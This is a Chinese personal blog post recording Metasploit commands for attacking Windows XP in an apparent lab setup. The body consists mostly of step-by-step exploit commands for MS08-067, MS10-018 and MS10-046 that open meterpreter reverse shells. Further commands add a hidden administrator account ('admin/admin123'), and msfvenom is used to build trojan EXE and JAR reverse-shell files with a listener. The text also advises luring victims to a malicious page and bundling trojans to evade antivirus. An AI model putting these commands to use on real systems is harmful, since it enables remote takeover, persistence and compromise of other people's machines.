<!DOCTYPE html>












  


<html class="theme-next mist use-motion" lang="zh-CN">
<head><meta name="generator" content="Hexo 3.8.0">
  <meta charset="UTF-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=2">
<meta name="theme-color" content="#222">


























<link rel="stylesheet" href="/blog/lib/font-awesome/css/font-awesome.min.css?v=4.6.2">

<link rel="stylesheet" href="/blog/css/main.css?v=6.7.0">


  <link rel="apple-touch-icon" sizes="180x180" href="/blog/images/apple-touch-icon-next.png?v=6.7.0">


  <link rel="icon" type="image/png" sizes="32x32" href="/blog/images/favicon.jpg?v=6.7.0">


  <link rel="icon" type="image/png" sizes="16x16" href="/blog/images/favicon.jpg?v=6.7.0">


  <link rel="mask-icon" href="/blog/images/logo.svg?v=6.7.0" color="#222">







<script id="hexo.configurations">
  var NexT = window.NexT || {};
  var CONFIG = {
    root: '/blog/',
    scheme: 'Mist',
    version: '6.7.0',
    sidebar: {"position":"left","display":"post","offset":12,"b2t":false,"scrollpercent":false,"onmobile":false},
    fancybox: false,
    fastclick: false,
    lazyload: false,
    tabs: true,
    motion: {"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},
    algolia: {
      applicationID: '',
      apiKey: '',
      indexName: '',
      hits: {"per_page":10},
      labels: {"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}
    }
  };
</script>


  


<script src="//cdn.bootcss.com/pace/1.0.2/pace.min.js"></script>
<link href="//cdn.bootcss.com/pace/1.0.2/themes/pink/pace-theme-flash.css" rel="stylesheet">
  <style>
      .pace .pace-progress {
          background: #1E92FB; /*进度条颜色*/
          height: 3px;
      }
      .pace .pace-progress-inner {
           box-shadow: 0 0 10px #1E92FB, 0 0 5px     #1E92FB; /*阴影颜色*/
      }
      .pace .pace-activity {
          border-top-color: #1E92FB;    /*上边框颜色*/
          border-left-color: #1E92FB;    /*左边框颜色*/
      }
  </style>

  <meta name="description" content="学黑客技术必备啊简单来说，Metasploit是一款开源的安全漏洞检测工具，它本身附带一千多个渗透方式，和数百种攻击载荷来看看长啥样 下面记录关于windows xp 系统的一些漏洞。进行攻击的命令记录测试环境：1、kali2.02、windows xp pro1、漏洞： ms08_06712345678910# 可通过命令来查看详情:search ms08_067use exploit/wind">
<meta name="keywords" content="干货">
<meta property="og:type" content="article">
<meta property="og:title" content="Metasploit 的一些渗透命令记录">
<meta property="og:url" content="https://rstyro.github.io/blog/2017/08/12/Metasploit 的一些渗透命令记录/index.html">
<meta property="og:site_name" content="帅大叔的博客">
<meta property="og:description" content="学黑客技术必备啊简单来说，Metasploit是一款开源的安全漏洞检测工具，它本身附带一千多个渗透方式，和数百种攻击载荷来看看长啥样 下面记录关于windows xp 系统的一些漏洞。进行攻击的命令记录测试环境：1、kali2.02、windows xp pro1、漏洞： ms08_06712345678910# 可通过命令来查看详情:search ms08_067use exploit/wind">
<meta property="og:locale" content="zh-CN">
<meta property="og:image" content="https://rstyro.github.io/blog/2017/08/12/Metasploit%20的一些渗透命令记录/1502693518259026341.png">
<meta property="og:updated_time" content="2019-01-12T14:57:14.136Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="Metasploit 的一些渗透命令记录">
<meta name="twitter:description" content="学黑客技术必备啊简单来说，Metasploit是一款开源的安全漏洞检测工具，它本身附带一千多个渗透方式，和数百种攻击载荷来看看长啥样 下面记录关于windows xp 系统的一些漏洞。进行攻击的命令记录测试环境：1、kali2.02、windows xp pro1、漏洞： ms08_06712345678910# 可通过命令来查看详情:search ms08_067use exploit/wind">
<meta name="twitter:image" content="https://rstyro.github.io/blog/2017/08/12/Metasploit%20的一些渗透命令记录/1502693518259026341.png">






  <link rel="canonical" href="https://rstyro.github.io/blog/2017/08/12/Metasploit 的一些渗透命令记录/">



<script id="page.configurations">
  CONFIG.page = {
    sidebar: "",
  };
</script>

  <title>Metasploit 的一些渗透命令记录 | 帅大叔的博客</title>
  






  <script>
    var _hmt = _hmt || [];
    (function() {
      var hm = document.createElement("script");
      hm.src = "https://hm.baidu.com/hm.js?cd2197f8af1d69b326360027b8f93d92";
      var s = document.getElementsByTagName("script")[0];
      s.parentNode.insertBefore(hm, s);
    })();
  </script>







  <noscript>
  <style>
  .use-motion .motion-element,
  .use-motion .brand,
  .use-motion .menu-item,
  .sidebar-inner,
  .use-motion .post-block,
  .use-motion .pagination,
  .use-motion .comments,
  .use-motion .post-header,
  .use-motion .post-body,
  .use-motion .collection-title { opacity: initial; }

  .use-motion .logo,
  .use-motion .site-title,
  .use-motion .site-subtitle {
    opacity: initial;
    top: initial;
  }

  .use-motion .logo-line-before i { left: initial; }
  .use-motion .logo-line-after i { right: initial; }
  </style>
</noscript>

</head>

<body itemscope="" itemtype="http://schema.org/WebPage" lang="zh-CN">

  
  
    
  

  <div class="container sidebar-position-left page-post-detail">
    <div class="headband"></div>

    <header id="header" class="header" itemscope="" itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-wrapper">
  <div class="site-meta">
    

    <div class="custom-logo-site-title">
      <a href="/blog/" class="brand" rel="start">
        <span class="logo-line-before"><i></i></span>
        <span class="site-title">帅大叔的博客</span>
        <span class="logo-line-after"><i></i></span>
      </a>
    </div>
    
      
        <p class="site-subtitle">信你所信，为你所见</p>
      
    
    
  </div>

  <div class="site-nav-toggle">
    <button aria-label="切换导航栏">
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
    </button>
  </div>
</div>



<nav class="site-nav">
  
    <ul id="menu" class="menu">
      
        
        
        
          
          <li class="menu-item menu-item-home">

    
    
    

    

    <a href="/blog/" rel="section">首页</a>

  </li>
        
        
        
          
          <li class="menu-item menu-item-about">

    
    
    

    

    <a href="/blog/about/" rel="section">关于</a>

  </li>
        
        
        
          
          <li class="menu-item menu-item-tags">

    
    
    

    

    <a href="/blog/tags/" rel="section">标签</a>

  </li>
        
        
        
          
          <li class="menu-item menu-item-categories">

    
    
    

    

    <a href="/blog/categories/" rel="section">分类</a>

  </li>
        
        
        
          
          <li class="menu-item menu-item-archives">

    
    
    

    

    <a href="/blog/archives/" rel="section">归档</a>

  </li>

      
      
        <li class="menu-item menu-item-search">
          
            <a href="javascript:;" class="popup-trigger">
          
            搜索</a>
        </li>
      
    </ul>
  

  
    

  

  
    <div class="site-search">
      
  <div class="popup search-popup local-search-popup">
  <div class="local-search-header clearfix">
    <span class="search-icon">
      <i class="fa fa-search"></i>
    </span>
    <span class="popup-btn-close">
      <i class="fa fa-times-circle"></i>
    </span>
    <div class="local-search-input-wrapper">
      <input autocomplete="off" placeholder="搜索..." spellcheck="false" type="text" id="local-search-input">
    </div>
  </div>
  <div id="local-search-result"></div>
</div>



    </div>
  
</nav>



  



</div>
    </header>

    


    <main id="main" class="main">
      <div class="main-inner">
        <div class="content-wrap">
          
          <div id="content" class="content">
            

  <div id="posts" class="posts-expand">
    

  

  
  
  

  

  <article class="post post-type-normal" itemscope="" itemtype="http://schema.org/Article">
  
  
  
  <div class="post-block">
    <link itemprop="mainEntityOfPage" href="https://rstyro.github.io/blog/blog/2017/08/12/Metasploit 的一些渗透命令记录/">

    <span hidden itemprop="author" itemscope="" itemtype="http://schema.org/Person">
      <meta itemprop="name" content="rstyro">
      <meta itemprop="description" content="帅大叔个人站点，记录一路走来的坑坑坎坎。">
      <meta itemprop="image" content="/blog/images/avatar.jpg">
    </span>

    <span hidden itemprop="publisher" itemscope="" itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="帅大叔的博客">
    </span>

    
      <header class="post-header">

        
        
          <h1 class="post-title" itemprop="name headline">Metasploit 的一些渗透命令记录

              
            
          </h1>
        

        <div class="post-meta">
          <span class="post-time">

            
            
            

            
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              
                <span class="post-meta-item-text">发表于</span>
              

              
                
              

              <time title="创建时间：2017-08-12 11:51:36" itemprop="dateCreated datePublished" datetime="2017-08-12T11:51:36+08:00">2017-08-12</time>
            

            
              

              
                
                <span class="post-meta-divider">|</span>
                

                <span class="post-meta-item-icon">
                  <i class="fa fa-calendar-check-o"></i>
                </span>
                
                  <span class="post-meta-item-text">更新于</span>
                
                <time title="修改时间：2019-01-12 22:57:14" itemprop="dateModified" datetime="2019-01-12T22:57:14+08:00">2019-01-12</time>
              
            
          </span>

          
            <span class="post-category">
            
              <span class="post-meta-divider">|</span>
            
              <span class="post-meta-item-icon">
                <i class="fa fa-folder-o"></i>
              </span>
              
                <span class="post-meta-item-text">分类于</span>
              
              
                <span itemprop="about" itemscope="" itemtype="http://schema.org/Thing"><a href="/blog/categories/笔记/" itemprop="url" rel="index"><span itemprop="name">笔记</span></a></span>

                
                
              
            </span>
          

          
            
              <span class="post-comments-count">
                <span class="post-meta-divider">|</span>
                <span class="post-meta-item-icon">
                  <i class="fa fa-comment-o"></i>
                </span>
                <a href="/blog/2017/08/12/Metasploit 的一些渗透命令记录/#comments" itemprop="discussionUrl">
                  <span class="post-meta-item-text">评论数：</span> <span class="post-comments-count valine-comment-count" data-xid="/blog/2017/08/12/Metasploit 的一些渗透命令记录/" itemprop="commentCount"></span>
                </a>
              </span>
            
          

          
          

          
            <span class="post-meta-divider">|</span>
            <span class="post-meta-item-icon">
            <i class="fa fa-eye"></i>
             阅读次数： 
            <span class="busuanzi-value" id="busuanzi_value_page_pv"></span>
            </span>
          

          

          

        </div>
      </header>
    

    
    
    
    <div class="post-body" itemprop="articleBody">

      
      

      
        <h2 id="学黑客技术必备啊"><a href="#学黑客技术必备啊" class="headerlink" title="学黑客技术必备啊"></a>学黑客技术必备啊</h2><h3 id="简单来说，Metasploit是一款开源的安全漏洞检测工具，它本身附带一千多个渗透方式，和数百种攻击载荷"><a href="#简单来说，Metasploit是一款开源的安全漏洞检测工具，它本身附带一千多个渗透方式，和数百种攻击载荷" class="headerlink" title="简单来说，Metasploit是一款开源的安全漏洞检测工具，它本身附带一千多个渗透方式，和数百种攻击载荷"></a>简单来说，Metasploit是一款开源的安全漏洞检测工具，它本身附带一千多个渗透方式，和数百种攻击载荷</h3><h5 id="来看看长啥样"><a href="#来看看长啥样" class="headerlink" title="来看看长啥样"></a>来看看长啥样</h5><p><img src="/blog/2017/08/12/Metasploit 的一些渗透命令记录/1502693518259026341.png" alt=""></p>
<h2 id="下面记录关于windows-xp-系统的一些漏洞。进行攻击的命令记录"><a href="#下面记录关于windows-xp-系统的一些漏洞。进行攻击的命令记录" class="headerlink" title="下面记录关于windows xp 系统的一些漏洞。进行攻击的命令记录"></a>下面记录关于windows xp 系统的一些漏洞。进行攻击的命令记录</h2><h3 id="测试环境："><a href="#测试环境：" class="headerlink" title="测试环境："></a>测试环境：</h3><h4 id="1、kali2-0"><a href="#1、kali2-0" class="headerlink" title="1、kali2.0"></a>1、kali2.0</h4><h4 id="2、windows-xp-pro"><a href="#2、windows-xp-pro" class="headerlink" title="2、windows xp pro"></a>2、windows xp pro</h4><h2 id="1、漏洞：-ms08-067"><a href="#1、漏洞：-ms08-067" class="headerlink" title="1、漏洞： ms08_067"></a>1、漏洞： ms08_067</h2><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line"># 可通过命令来查看详情:search ms08_067</span><br><span class="line">use exploit/windows/smb/ms08_067_netapi    //使用exploit</span><br><span class="line">set payload windows/meterpreter/reverse_tcp  //设置攻击载荷</span><br><span class="line">show options  	//查看参数配置</span><br><span class="line">set RHOST 192.168.12.131   //设置目标主机ip ，我这里的目标主机为192.168.12.131</span><br><span class="line">set LHOST 192.168.12.130   //设置本机ip ，我这里的本主机为192.168.12.130</span><br><span class="line">set target 0        //这个设置自动</span><br><span class="line">run  //开始攻击</span><br><span class="line"># 获取到反弹的shell</span><br><span class="line">shell   //进入对方电脑的终端</span><br></pre></td></tr></table></figure>
<h2 id="2、漏洞-ms10-018（浏览器提权）"><a href="#2、漏洞-ms10-018（浏览器提权）" class="headerlink" title="2、漏洞 ms10_018（浏览器提权）"></a>2、漏洞 ms10_018（浏览器提权）</h2><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><span class="line"># 同样的我们看看这个漏洞(搜索)：search ms10_018</span><br><span class="line">use exploit/windows/browser/ms10_018_ie_behaviors    //使用exploit</span><br><span class="line">set payload windows/meterpreter/reverse_tcp  //设置攻击载荷</span><br><span class="line">show options  	//查看参数配置</span><br><span class="line">set SRVHOST 192.168.12.130   //设置服务器主机ip ，我这里的目标主机为192.168.12.130</span><br><span class="line">set LHOST 192.168.12.130   //设置本机ip ，我这里的本主机为192.168.12.130</span><br><span class="line">set URIPATH test        //这个设置项目名为test</span><br><span class="line">exploit  //开始渗透		</span><br><span class="line"># 等待目标访问我们的网页，或者引诱目标访问我们的网页</span><br><span class="line"># 获取到session(当出现类似： Successfully migrated to services.exe (680) 这样就是成功了)</span><br><span class="line">sessions -i //查看 session</span><br><span class="line">session -i 1 //选择id ，1就是id</span><br><span class="line"># 获得shell</span><br><span class="line"># 可以在对方的系统上添加一个管理员权限：命令如下</span><br><span class="line">net user admin admin123 /add //这条命令的意思是新建一个用户admin,密码为admin123</span><br><span class="line">net localgroup administrators admin /add //这条命令的意思是吧admin 添加到管理员组</span><br></pre></td></tr></table></figure>
<h2 id="3、漏洞-ms10-046（快捷方式漏洞）"><a href="#3、漏洞-ms10-046（快捷方式漏洞）" class="headerlink" title="3、漏洞 ms10_046（快捷方式漏洞）"></a>3、漏洞 ms10_046（快捷方式漏洞）</h2><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><span class="line"># 同样的我们看看这个漏洞(搜索)：search ms10_046</span><br><span class="line">use exploit/windows/browser/ms10_046_shortcut_icon_dllloader    //使用exploit</span><br><span class="line">set payload windows/meterpreter/reverse_tcp  //设置攻击载荷</span><br><span class="line">show options  	//查看参数配置</span><br><span class="line">set SRVHOST 192.168.12.130   //设置服务器主机ip ，我这里的目标主机为192.168.12.130</span><br><span class="line">set LHOST 192.168.12.130   //设置本机ip ，我这里的本主机为192.168.12.130</span><br><span class="line">run        //开始渗透	</span><br><span class="line">exploit	</span><br><span class="line"># 等待目标访问我们的网页，或者引诱目标访问我们的网页(或者http://192.168.12.130:80/) 或者文件夹里访问：\\192.168.12.130\ILSSNnFb\ </span><br><span class="line"># 获取到session(当出现类似： Successfully migrated to services.exe (680) 这样就是成功了)</span><br><span class="line">sessions -l //查看 session</span><br><span class="line">session -i 1 //选择id ，1就是id</span><br><span class="line"># 获得shell</span><br><span class="line"># 可以在对方的系统上添加一个管理员权限：命令如下</span><br><span class="line">net user admin admin123 /add //这条命令的意思是新建一个用户admin,密码为admin123</span><br><span class="line">net localgroup administrators admin /add //这条命令的意思是吧admin 添加到管理员组</span><br></pre></td></tr></table></figure>
<blockquote>
<h4 id="当我们没有发现漏洞的时候，我们就可以利用木马进行攻击了。但是现在的杀毒软件挺成熟的，普通生成的木马容易被发现，所有我们要做的事学会免杀，或者可以和其他软件进行捆绑。"><a href="#当我们没有发现漏洞的时候，我们就可以利用木马进行攻击了。但是现在的杀毒软件挺成熟的，普通生成的木马容易被发现，所有我们要做的事学会免杀，或者可以和其他软件进行捆绑。" class="headerlink" title="当我们没有发现漏洞的时候，我们就可以利用木马进行攻击了。但是现在的杀毒软件挺成熟的，普通生成的木马容易被发现，所有我们要做的事学会免杀，或者可以和其他软件进行捆绑。"></a>当我们没有发现漏洞的时候，我们就可以利用木马进行攻击了。但是现在的杀毒软件挺成熟的，普通生成的木马容易被发现，所有我们要做的事学会免杀，或者可以和其他软件进行捆绑。</h4><h4 id="免杀是一门高级的学问，在这里就不再讲述了，下面介绍的是用msfvenom-生成木马。"><a href="#免杀是一门高级的学问，在这里就不再讲述了，下面介绍的是用msfvenom-生成木马。" class="headerlink" title="免杀是一门高级的学问，在这里就不再讲述了，下面介绍的是用msfvenom 生成木马。"></a>免杀是一门高级的学问，在这里就不再讲述了，下面介绍的是用msfvenom 生成木马。</h4></blockquote>
<h2 id="4、木马生成"><a href="#4、木马生成" class="headerlink" title="4、木马生成"></a>4、木马生成</h2><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line"># 当没有漏洞的时候，就可以使用木马来进行渗透了。</span><br><span class="line"># 利用 msfvenom 工具生成木马</span><br><span class="line"># -p 是设置payload, -f 是生成文件的格式 /root/muma.exe 是生成的文件名</span><br><span class="line">msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.12.130 LPORT=1234 -f exe &gt; /root/muma.exe 	</span><br><span class="line"># 上面是exe 的格式，java的格式如下：</span><br><span class="line">msfvenom -p java/meterpreter/reverse_tcp LHOST=192.168.12.130 LPORT=1234 -f jar &gt; /root/muma.jar</span><br><span class="line"># 如果是java 下面的set payload 也要改成和生成文件的payload 的一致。</span><br><span class="line"># 打开msfconsole进行监听</span><br><span class="line">use exploit/multi/handler			//</span><br><span class="line">set payload windows/meterpreter/reverse_tcp  //设置载荷</span><br><span class="line">set LHOST 192.168.12.130   //设置本机地址</span><br><span class="line">set LPORT 1234   //设置监听端口，这个和上面用msfvenom 设置的端口一致</span><br><span class="line">run  //开始渗透</span><br><span class="line">获取到shell</span><br></pre></td></tr></table></figure>
<blockquote>
<p>说下废话，哥当年选计算机专业，就是感觉黑客很牛掰，黑着黑那的很神奇。但是现在发现和我想的不太一样呢。没想到计算机行业有那么多分类。<br>黑客技术很高深，要好好学，研究才行，哥只是个业余的。</p>
</blockquote>

      
    </div>

    

    
    
    
	
	    <div>
	
	<div>
    
        <div style="text-align:center;color: #ccc;font-size:14px;">-------------本文结束 <i class="fa fa-heartbeat"></i> 感谢您的阅读-------------</div>
    
</div>
	
	</div>

    

    
      
    
    
      <div>
        <div style="padding: 10px 0; margin: 20px auto; width: 90%; text-align: center;">
  <div></div>
  <button id="rewardButton" disable="enable" onclick="var qr = document.getElementById('QR'); if (qr.style.display === 'none') {qr.style.display='block';} else {qr.style.display='none'}">
    <span>打赏</span>
  </button>
  <div id="QR" style="display: none;">

    
      <div id="wechat" style="display: inline-block">
        <img id="wechat_qr" src="/blog/images/wechat_pay.jpg" alt="rstyro 微信支付">
        <p>微信支付</p>
      </div>
    

    
      <div id="alipay" style="display: inline-block">
        <img id="alipay_qr" src="/blog/images/alipay.jpg" alt="rstyro 支付宝">
        <p>支付宝</p>
      </div>
    

    

  </div>
</div>

      </div>
    

    

    <footer class="post-footer">
	
	<div>    
	 
	 
	<ul class="post-copyright">
	  <li class="post-copyright-author">
		  <strong>本文作者：</strong>rstyro
	  </li>
	  <li class="post-copyright-link">
		<strong>本文链接：</strong>
		<a href="/blog/2017/08/12/Metasploit 的一些渗透命令记录/" title="Metasploit 的一些渗透命令记录">https://rstyro.github.io/blog/2017/08/12/Metasploit 的一些渗透命令记录/</a>
	  </li>
	  <li class="post-copyright-license">
		<strong>版权： </strong>
		转载注明出处！
	  </li>
	</ul>
	
	</div>
	

      
        <div class="post-tags">
          
            <a href="/blog/tags/干货/" rel="tag"><i class="fa fa-tag"></i> 干货</a>
          
        </div>
      

      
      
      

      
        <div class="post-nav">
          <div class="post-nav-next post-nav-item">
            
              <a href="/blog/2017/08/12/SVN 代码迁移/" rel="next" title="SVN 代码迁移">
                <i class="fa fa-chevron-left"></i> SVN 代码迁移
              </a>
            
          </div>

          <span class="post-nav-divider"></span>

          <div class="post-nav-prev post-nav-item">
            
              <a href="/blog/2017/08/12/Spring Boot (八)：配置Druid 连接池/" rel="prev" title="Spring Boot (八)：配置Druid 连接池">
                Spring Boot (八)：配置Druid 连接池 <i class="fa fa-chevron-right"></i>
              </a>
            
          </div>
        </div>
      

      
      
    </footer>
  </div>
  
  
  


  </article>


  </div>


          </div>
          

  
    <div class="comments" id="comments">
    </div>

  



        </div>
        
          
  
  <div class="sidebar-toggle">
    <div class="sidebar-toggle-line-wrap">
      <span class="sidebar-toggle-line sidebar-toggle-line-first"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-middle"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-last"></span>
    </div>
  </div>

  <aside id="sidebar" class="sidebar">
    
    <div class="sidebar-inner">

      

      
        <ul class="sidebar-nav motion-element">
          <li class="sidebar-nav-toc sidebar-nav-active" data-target="post-toc-wrap">
            文章目录
          </li>
          <li class="sidebar-nav-overview" data-target="site-overview-wrap">
            站点概览
          </li>
        </ul>
      

      <div class="site-overview-wrap sidebar-panel">
        <div class="site-overview">
          <div class="site-author motion-element" itemprop="author" itemscope="" itemtype="http://schema.org/Person">
            
              <img class="site-author-image" itemprop="image" src="/blog/images/avatar.jpg" alt="rstyro">
            
              <p class="site-author-name" itemprop="name">rstyro</p>
              <p class="site-description motion-element" itemprop="description">帅大叔个人站点，记录一路走来的坑坑坎坎。</p>
          </div>

          
            <nav class="site-state motion-element">
              
                <div class="site-state-item site-state-posts">
                
                  <a href="/blog/archives/">
                
                    <span class="site-state-item-count">129</span>
                    <span class="site-state-item-name">日志</span>
                  </a>
                </div>
              

              
                
                
                <div class="site-state-item site-state-categories">
                  <a href="/blog/categories/index.html">
                    
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                    <span class="site-state-item-count">9</span>
                    <span class="site-state-item-name">分类</span>
                  </a>
                </div>
              

              
                
                
                <div class="site-state-item site-state-tags">
                  <a href="/blog/tags/index.html">
                    
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                    <span class="site-state-item-count">24</span>
                    <span class="site-state-item-name">标签</span>
                  </a>
                </div>
              
            </nav>
          

          

          
            <div class="links-of-author motion-element">
              
                <span class="links-of-author-item">
                  
                  
                    
                  
                  
                    
                  
                  <a href="https://github.com/rstyro" title="GitHub &rarr; https://github.com/rstyro" rel="noopener" target="_blank"><i class="fa fa-fw fa-github"></i>GitHub</a>
                </span>
              
                <span class="links-of-author-item">
                  
                  
                    
                  
                  
                    
                  
                  <a href="/blog/1006059906" title="QQ &rarr; 1006059906"><i class="fa fa-fw fa-qq"></i>QQ</a>
                </span>
              
            </div>
          

          

          
          
            <div class="links-of-blogroll motion-element links-of-blogroll-block">
              <div class="links-of-blogroll-title">
                <i class="fa  fa-fw fa-link"></i>
                友链
              </div>
              <ul class="links-of-blogroll-list">
                
                  <li class="links-of-blogroll-item">
                    <a href="https://rstyro.github.io/blog/" title="https://rstyro.github.io/blog/">帅大叔博客</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="https://www.zhyd.me/" title="https://www.zhyd.me/" rel="noopener" target="_blank">张亚东博客</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="http://www.devsong.org/" title="http://www.devsong.org/" rel="noopener" target="_blank">DevSONG</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="https://www.dalaoyang.cn/" title="https://www.dalaoyang.cn/" rel="noopener" target="_blank">dalaoyang</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="https://www.chenshuangyi.com/" title="https://www.chenshuangyi.com/" rel="noopener" target="_blank">陈双义博客</a>
                  </li>
                
              </ul>
            </div>
          

          
            
          
          

        </div>
      </div>

      
      <!--noindex-->
        <div class="post-toc-wrap motion-element sidebar-panel sidebar-panel-active">
          <div class="post-toc">

            
            
            
            

            
              <div class="post-toc-content"><ol class="nav"><li class="nav-item nav-level-2"><a class="nav-link" href="#学黑客技术必备啊"><span class="nav-number">1.</span> <span class="nav-text">学黑客技术必备啊</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#简单来说，Metasploit是一款开源的安全漏洞检测工具，它本身附带一千多个渗透方式，和数百种攻击载荷"><span class="nav-number">1.1.</span> <span class="nav-text">简单来说，Metasploit是一款开源的安全漏洞检测工具，它本身附带一千多个渗透方式，和数百种攻击载荷</span></a><ol class="nav-child"><li class="nav-item nav-level-5"><a class="nav-link" href="#来看看长啥样"><span class="nav-number">1.1.0.1.</span> <span class="nav-text">来看看长啥样</span></a></li></ol></li></ol></li></ol><li class="nav-item nav-level-2"><a class="nav-link" href="#下面记录关于windows-xp-系统的一些漏洞。进行攻击的命令记录"><span class="nav-number">2.</span> <span class="nav-text">下面记录关于windows xp 系统的一些漏洞。进行攻击的命令记录</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#测试环境："><span class="nav-number">2.1.</span> <span class="nav-text">测试环境：</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#1、kali2-0"><span class="nav-number">2.1.1.</span> <span class="nav-text">1、kali2.0</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#2、windows-xp-pro"><span class="nav-number">2.1.2.</span> <span class="nav-text">2、windows xp pro</span></a></li></ol></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#1、漏洞：-ms08-067"><span class="nav-number">3.</span> <span class="nav-text">1、漏洞： ms08_067</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#2、漏洞-ms10-018（浏览器提权）"><span class="nav-number">4.</span> <span class="nav-text">2、漏洞 ms10_018（浏览器提权）</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#3、漏洞-ms10-046（快捷方式漏洞）"><span class="nav-number">5.</span> <span class="nav-text">3、漏洞 ms10_046（快捷方式漏洞）</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#当我们没有发现漏洞的时候，我们就可以利用木马进行攻击了。但是现在的杀毒软件挺成熟的，普通生成的木马容易被发现，所有我们要做的事学会免杀，或者可以和其他软件进行捆绑。"><span class="nav-number">5.0.1.</span> <span class="nav-text">当我们没有发现漏洞的时候，我们就可以利用木马进行攻击了。但是现在的杀毒软件挺成熟的，普通生成的木马容易被发现，所有我们要做的事学会免杀，或者可以和其他软件进行捆绑。</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#免杀是一门高级的学问，在这里就不再讲述了，下面介绍的是用msfvenom-生成木马。"><span class="nav-number">5.0.2.</span> <span class="nav-text">免杀是一门高级的学问，在这里就不再讲述了，下面介绍的是用msfvenom 生成木马。</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#4、木马生成"><span class="nav-number">6.</span> <span class="nav-text">4、木马生成</span></a></li></div>
            

          </div>
        </div>
      <!--/noindex-->
      

      

    </div>
  </aside>


        
      </div>
    </main>

    <footer id="footer" class="footer">
      <div class="footer-inner">
        <div class="copyright">&copy; <span itemprop="copyrightYear">2019</span>
  <span class="with-love" id="animate">
    <i class="fa fa-user"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">rstyro</span>

  

  
</div>









        
<div class="busuanzi-count">
  <script async src="https://busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script>

  
    <span class="post-meta-item-icon">
      <i class="fa fa-user"></i>
    </span>
    <span class="site-uv" title="总访客量">
      <span class="busuanzi-value" id="busuanzi_value_site_uv"></span>
    </span>
  

  
    <span class="post-meta-divider">|</span>
  

  
    <span class="post-meta-item-icon">
      <i class="fa fa-eye"></i>
    </span>
    <span class="site-pv" title="总访问量">
      <span class="busuanzi-value" id="busuanzi_value_site_pv"></span>
    </span>
  
</div>









        
      </div>
    </footer>

    
      <div class="back-to-top">
        <i class="fa fa-arrow-up"></i>
        
      </div>
    

    

    

    
  </div>

  

<script>
  if (Object.prototype.toString.call(window.Promise) !== '[object Function]') {
    window.Promise = null;
  }
</script>


























  
  <script src="/blog/lib/jquery/index.js?v=2.1.3"></script>

  
  <script src="/blog/lib/velocity/velocity.min.js?v=1.2.1"></script>

  
  <script src="/blog/lib/velocity/velocity.ui.min.js?v=1.2.1"></script>


  


  <script src="/blog/js/src/utils.js?v=6.7.0"></script>

  <script src="/blog/js/src/motion.js?v=6.7.0"></script>



  
  

  
  <script src="/blog/js/src/scrollspy.js?v=6.7.0"></script>
<script src="/blog/js/src/post-details.js?v=6.7.0"></script>



  


  <script src="/blog/js/src/bootstrap.js?v=6.7.0"></script>



  
  




  

<script src="//cdn1.lncld.net/static/js/3.11.1/av-min.js"></script>



<script src="//unpkg.com/valine/dist/Valine.min.js"></script>

